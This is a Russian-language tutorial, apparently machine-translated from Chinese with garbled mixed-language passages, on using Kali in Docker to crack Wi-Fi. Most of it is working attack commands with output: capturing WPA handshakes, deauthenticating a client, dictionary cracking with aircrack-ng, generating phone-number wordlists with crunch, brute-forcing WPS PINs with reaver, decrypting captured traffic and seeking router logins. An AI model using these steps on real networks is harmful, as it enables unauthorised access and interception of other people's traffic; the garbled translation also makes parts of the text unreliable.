0x00 Предисловие

Kali — это дистрибутив Linux, который обычно используется для тестирования на проникновение и объединяет множество инструментов безопасности. В этой статье делается попытка использовать Docker для установки Kali и взлома Wi-Fi.

Эта статья предназначена только для технических исследований, пожалуйста, не используйте ее в незаконных целях.

0x01 Установите систему Kali в Docker.

KaliОфициально предоставленоDockerзеркало：kalilinux/kali-last-release。但да这个зеркало基本没有Включать任何工具,Если вы хотите установить все инструменты,зеркало大小会超过4G。Это очевидно,Не всем нужно столько инструментов. поэтому,Пользователи могут использовать,написавDockerfileНастройте разныеKaliзеркало。

Для взлома Wi-Fi можно написать следующий файл Dockerfile.

FROM kalilinux/kali-last-release

RUN apt update && apt install -y pciutils net-tools procps crunch wordlists aircrack-ng reaver

WORKDIR /root/workspace

$ sudo docker build -t kali .
$ sudo docker run -it --net="host" --privileged -v $(pwd)/workspace:/root/workspace kali
┌──(root㉿drunkdream-LB0)-[~/workspace]
└─#

Требуется сеть во время выполнения с использованиемhostмодель,Таким образом, вы можете получить доступ к беспроводной сетевой карте на материнской машине.,При этом включите привилегированный режим, чтобы данные могли храниться постоянно;,Локальные каталоги можно монтировать в контейнеры.

Все последующие операции выполняются в этом контейнере.

0x02 Взлом пароля Wi-Fi

В основном здесь используетсяaircrack-ngсерия командWifiпарольтрескаться。

• Получить список беспроводных сетевых карт

└─# airmon-ng                                                                                                  
Your kernel has module support but you don't have modprobe installed.
It is highly recommended to install modprobe (typically from kmod).
Your kernel has module support but you don't have modinfo installed.
It is highly recommended to install modinfo (typically from kmod).
Warning: driver detection without modinfo may yield inaccurate results.

PHY     Interface       Driver          Chipset

phy0    wlp0s20f3       iwlwifi         Intel Corporation Comet Lake PCH CNVi WiFi

• Включите режим прослушивания

└─# airmon-ng start wlp0s20f3

Your kernel has module support but you don't have modprobe installed.
It is highly recommended to install modprobe (typically from kmod).
Your kernel has module support but you don't have modinfo installed.
It is highly recommended to install modinfo (typically from kmod).
Warning: driver detection without modinfo may yield inaccurate results.


PHY     Interface       Driver          Chipset

phy0    wlp0s20f3       iwlwifi         Intel Corporation Comet Lake PCH CNVi WiFi
                (mac80211 monitor mode vif enabled for [phy0]wlp0s20f3 on [phy0]wlp0s20f3mon)
                (mac80211 station mode vif disabled for [phy0]wlp0s20f3)

В настоящее время беспроводная сетевая карта больше не видна в системе материнской машины.,Напротив, есть еще одинwlp0s20f3monоборудование。

• Сканировать беспроводные сети

В настоящее время имя сетевой карты необходимо добавить в конце.mon

└─# airodump-ng wlp0s20f3mon
Warning: Detected you are using a non-UNICODE terminal character encoding.

 CH 11 ][ Elapsed: 24 s ][ 2022-05-22 15:36                                                                    

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                               

 74:CF:00:DA:F4:40  -11       15        0    0   2  130   WPA2 CCMP   PSK  CMCC-X5qG                         
 8C:53:C3:C8:16:E6  -13       18        4    0   1  130   WPA2 CCMP   PSK  Xiaomi_16E4

С помощью этой команды вы можете получить список ближайших Wi-Fi.

• Захват пакетов рукопожатия

использование: airodump-ng -c <беспроводной канал> --bssid <целевая беспроводная связьAPаппаратный адрес> -w <Имя файла сохранения результатов сканирования> <处于监听модельиз网卡名称>

└─# airodump-ng -c 2 --bssid 74:CF:00:DA:F4:40 -w dump wlp0s20f3mon
 CH  2 ][ Elapsed: 18 s ][ 2022-05-22 16:04 ][ WPA handshake: 74:CF:00:DA:F4:40

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                           

 74:CF:00:DA:F4:40  -13 100      215       15    0   2  130   WPA2 CCMP   PSK  CMCC-X5qG                      

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                             

 74:CF:00:DA:F4:40  1C:2A:DB:0E:D5:AC  -29   6e- 6e  1921    478     EAPOL  drunkdream

Используйте эту команду, чтобы получить соединение с указаннымWifiизклиентсписок。Когда захваченпакет рукопожатиячас,подскажетWPA handshake: 74:CF:00:DA:F4:40这样изнить,Вы можете остановить сбор данных. в это время,Пакет данных будет сохранен в текущем каталоге:

# ls -l | grep dump
-rwxrwxrwx 1 1000 1000      225870 May 22 23:30 dump-01.cap
-rwxrwxrwx 1 1000 1000         883 May 22 23:30 dump-01.csv
-rwxrwxrwx 1 1000 1000         601 May 22 23:30 dump-01.kismet.csv
-rwxrwxrwx 1 1000 1000        7330 May 22 23:30 dump-01.kismet.netxml
-rwxrwxrwx 1 1000 1000       92078 May 22 23:30 dump-01.log.csv

• Разрешить клиенту отключиться и снова подключиться

Если клиент всегда подключается нормально, перехватить пакет подтверждения будет сложно. В это время вам нужно выгнать клиента из сети:

использование: aireplay-ng -<攻击модель(0)> <Количество атак(10)> -a <беспроводнойAPАппаратный адрес> -c <用户оборудование Аппаратный адрес> <处于监听модельиз网卡名称>

└─# aireplay-ng -02 -a 74:CF:00:DA:F4:40 -c 1C:2A:DB:0E:D5:AC wlp0s20f3mon
16:11:07  Waiting for beacon frame (BSSID: 74:CF:00:DA:F4:40) on channel 2
16:11:07  Sending 64 directed DeAuth (code 7). STMAC: [1C:2A:DB:0E:D5:AC] [ 0| 2 ACKs]                         
16:11:08  Sending 64 directed DeAuth (code 7). STMAC: [1C:2A:DB:0E:D5:AC] [ 4|197 ACKs]

При выполнении этой операции необходимо следить за тем, чтобы одновременно выполнялась команда предыдущего шага.

• Прекратить мониторинг сетевой карты

└─# airmon-ng stop wlp0s20f3mon

• Взломать Wi-Fiпароль

Полученопакет рукопожатияизcapПосле файла,Вы можете выйти в оффлайн Взломать Wi-Fiпароль Понятно。比如使用性能较好из机器或да分布式方式进行трескаться。

использование: aircrack-ng -w словарь паролей <Включатьпакет рукопожатияизcapдокумент>

└─# aircrack-ng -a2 -b 74:CF:00:DA:F4:40 -w password.dict dump-01.cap
Reading packets, please wait...
Opening dump-01.cap
Read 1734 packets.

1 potential targets


                         Aircrack-ng 1.6 

      [00:00:00] 3/5 keys tested (71.89 k/s) 

      Time left: 0 seconds                                      60.00%

                         KEY FOUND! [ 12345678 ]


      Master Key     : 1E 30 C1 07 43 14 93 F2 74 D3 6D 8E F3 E2 E1 07 
                       18 4C 47 01 1F 87 D6 87 A7 0A 49 01 C0 24 F5 A1 

      Transient Key  : C4 D6 53 3B DA C8 D4 23 D5 7D 82 EE 73 67 7D 3D 
                       6B 6B 04 BF B1 66 29 74 3E E1 CB FD 8C 90 6B E8 
                       DE 0D 8C 32 21 3E 8E F0 9D 1A 2B 76 BB 0E 3E FD 
                       EB 95 8C 7D C0 43 90 12 4E 3D A4 A5 F2 75 CF FF 

      EAPOL HMAC     : 21 B2 AA 47 4F AB E3 77 53 24 73 21 7E 06 78 10

password.dictдасловарь паролей,Можно ли расшифровать пароль, зависит от того, включен ли пароль в словарь. поэтому,Для слишком сложного пароля,Вероятность успеха взлома будет очень низкой.

• генерироватьсловарь паролей

Чтобы повысить вероятность успеха взлома,Необходимо создать целевой словарь паролей на основе конкретных сценариев.,Например：День рождения、Номер мобильного телефона и т. д.。используется здесьcrunch命令来генерироватьсловарь паролей。

Использование синтаксиса и параметров:

crunch

[options]

min Установите минимальную длину нити (обязательно)
max Установите максимальную длину нити (обязательно)

-b Укажите размер выходного файла, чтобы файл словаря не был слишком большим.
-c Укажите количество строк, выводимых файлом, то есть количество строк, содержащих пароль.
-d Ограничить количество вхождений одного и того же элемента
-e Определить стоп-символ, то есть прекратить генерацию при достижении этой нити.
-f Вызов файла библиотеки (/etc/share/crunch/charset.lst)
-i Измените формат вывода, т. е. aaa, aab -> aaa,baa
-I Обычно используется в сочетании с -t, чтобы указать, что символ является буквальным.
-m Обычно в паре с -p
-o Сохранить пароль в указанный файл
-p Указывает элементы, которые нужно объединить.
-q Прочитайте файл пароля, то есть прочитайте pass.txt
-r Определение слова «тяжело»: «Нить, начать заново»
-s Укажите начальный символ, то есть начните с самостоятельно определенного пароляxxxx.
-t Укажите формат вывода пароля
-u Отключить процент печати (должен быть последний вариант)
-z Сжать сгенерированный файл словаря, поддерживающий gzip, bzip2, lzma, 7z.

специальные символы
% представлять числа
^ Представляет специальные символы
@ Представляет строчные буквы
, Представляет символы верхнего регистра

Пример использования — генерировать все номера мобильных телефонов, начинающиеся с 136:

└─# crunch 11 11 -t 136%%%%%%%% -o 136.txt
Crunch will now generate the following amount of data: 1200000000 bytes
1144 MB
1 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 100000000 

crunch:   7% completed generating output
crunch:  15% completed generating output
crunch:  22% completed generating output
crunch:  29% completed generating output
crunch:  36% completed generating output
crunch:  43% completed generating output
crunch:  51% completed generating output
crunch:  58% completed generating output
crunch:  65% completed generating output
crunch:  72% completed generating output
crunch:  79% completed generating output
crunch:  86% completed generating output
crunch:  93% completed generating output
crunch: 100% completed generating output

└─# ls -l | grep 136
-rwxrwxrwx 1 1000 1000  1200000000 May 23 15:16 136.txt

Видно, что сгенерированный словарь паролей по-прежнему относительно велик.

0x03 Взлом PIN-кода WPS

WPS (Wi-Fi Protected Setup, Wi-Fi Protected Setup) — это сертификационный проект, реализуемый Wi-Fi Alliance. Он в основном посвящен упрощению настроек шифрования безопасности беспроводных сетей. Традиционным способом, когда пользователи создают новую беспроводную сеть, они должны вручную установить имя сети (SSID) и ключ безопасности на точке доступа, а затем проверить ключ на клиенте, чтобы предотвратить вторжение «незваных гостей». Защищенная настройка Wi-Fi может помочь пользователям автоматически установить имя сети (SSID) и настроить ключ безопасности WPA2 самого высокого уровня. Беспроводные продукты с этой функцией часто имеют функциональную клавишу на корпусе, называемую кнопкой WPS. Вам нужно лишь аккуратно нажать кнопку или ввести персональный идентификационный номер (ПИН-код), а затем выполнить настройку шифрования беспроводной сети в два-три простых шага, при этом установив безопасное соединение между клиентом и маршрутизатором.

PIN-код представляет собой случайно сгенерированное 8-значное число. , который можно взломать путем полного обхода. 8-я цифра ПИН-кода является контрольной суммой, поэтому хакеру нужно выяснить только первые 7 цифр. Таким образом, количество уникальных PIN-кодов снизилось на один уровень до 10 в 7-й степени, что означает, что существует 10 миллионов вариаций.

При реализации идентификации PIN-кода точке доступа (беспроводному маршрутизатору) фактически необходимо выяснить, верны ли первая половина (первые 4 цифры) и вторая половина (последние 3 цифры) PIN-кода. При сбое первого подключения для аутентификации по PIN-коду ,маршрутизатор Пойду вклиентотправить обратно одинEAP-NACKинформация,И этим ответом,Злоумышленник сможет определить, правильна ли первая или вторая половина ПИН-кода. другими словами,Хакеру нужно всего лишь найти 4-значный PIN-код и 3-значный PIN-код из 7-значного PIN-кода. Таким образом,Уровень снова снизили с 10 миллионов вариаций до 11 000 (10 в 4-й степени + 10 в третьей степени) вариаций. поэтому,В реальных попытках взлома,Лучшее, что может сделать хакер, — это экспериментировать.11000Второсортный。

└─# reaver -i wlp0s20f3mon -b D0:C7:C0:DF:2A:74 -vv

Однако текущий уровень успеха этого метода атаки очень низок, и только несколько очень старых маршрутизаторов могут иметь эту уязвимость.

0x04 Перехват сетевого трафика

Первое использованиеairodump-ngКоманда для захвата пакетов данных（必须Включатьпакет рукопожатиярасшифровать）；а затем использоватьairdecap-ngКоманда для расшифровки пакетов。

использование：airdecap-ng -e <Wifi SSID> -p <Wifiпароль> <генерироватьиз.capдокумент>

└─# airdecap-ng -e drunkdream -p 12345678 dump-01.cap
Total number of stations seen            4
Total number of packets read          8838
Total number of WEP data packets         0
Total number of WPA data packets      2905
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets      2228
Number of bad TKIP (WPA) packets         0
Number of bad CCMP (WPA) packets         0

解密出来изпакет保存在dump-01-dec.capдокумент中,Просто используйте Wireshark, чтобы открыть его напрямую. Однако эта ситуация аналогична локальному захвату пакетов.,да不能解密httpsпакетиз。Если вы хотите расшифроватьhttpsпакет,Можно рассмотреть возможность объединенияатака «человек посередине»。

0x05 Взлом пароля маршрутизатора

После получения пароля вы сможете успешно подключиться к Wi-Fi. В это время, если вы войдете на страницу управления маршрутизатором, вы получите дополнительную информацию.

в целоммаршрутизаторизipАдрес：192.168.1.1、192.168.10.1、192.168.100.1ждать。Если это действительно не работает, вы все равно можете пройти мимо.ipи сканирование портов для определения。

После получения IP-адреса вам необходимо получить пароль для входа. Ниже приведены некоторые распространенные пароли по умолчанию:

0x06 Сводка

трескатьсябеспроводной网络парольиз关键да Полученопакет рукопожатия,Затем используйте словарь для автономного взрыва. Поэтому то, включен ли пароль в словарь, становится ключом к тому, можно ли расшифровать пароль.

WPS — еще один метод взлома WIFI, но в реальных тестах уровень успеха оказался очень низким.

0x07 Ссылки

• Kali 2 | Начинаю свой первый тест на проникновение в беспроводную сеть с помощью airmon-ng
• Взломайте беспроводные сети с помощью инструмента Aircrack-ng
• Использование reaver для аудита безопасности беспроводной сети
• Как взломать WIFI сети Wi-Fi с помощью пароля Reaver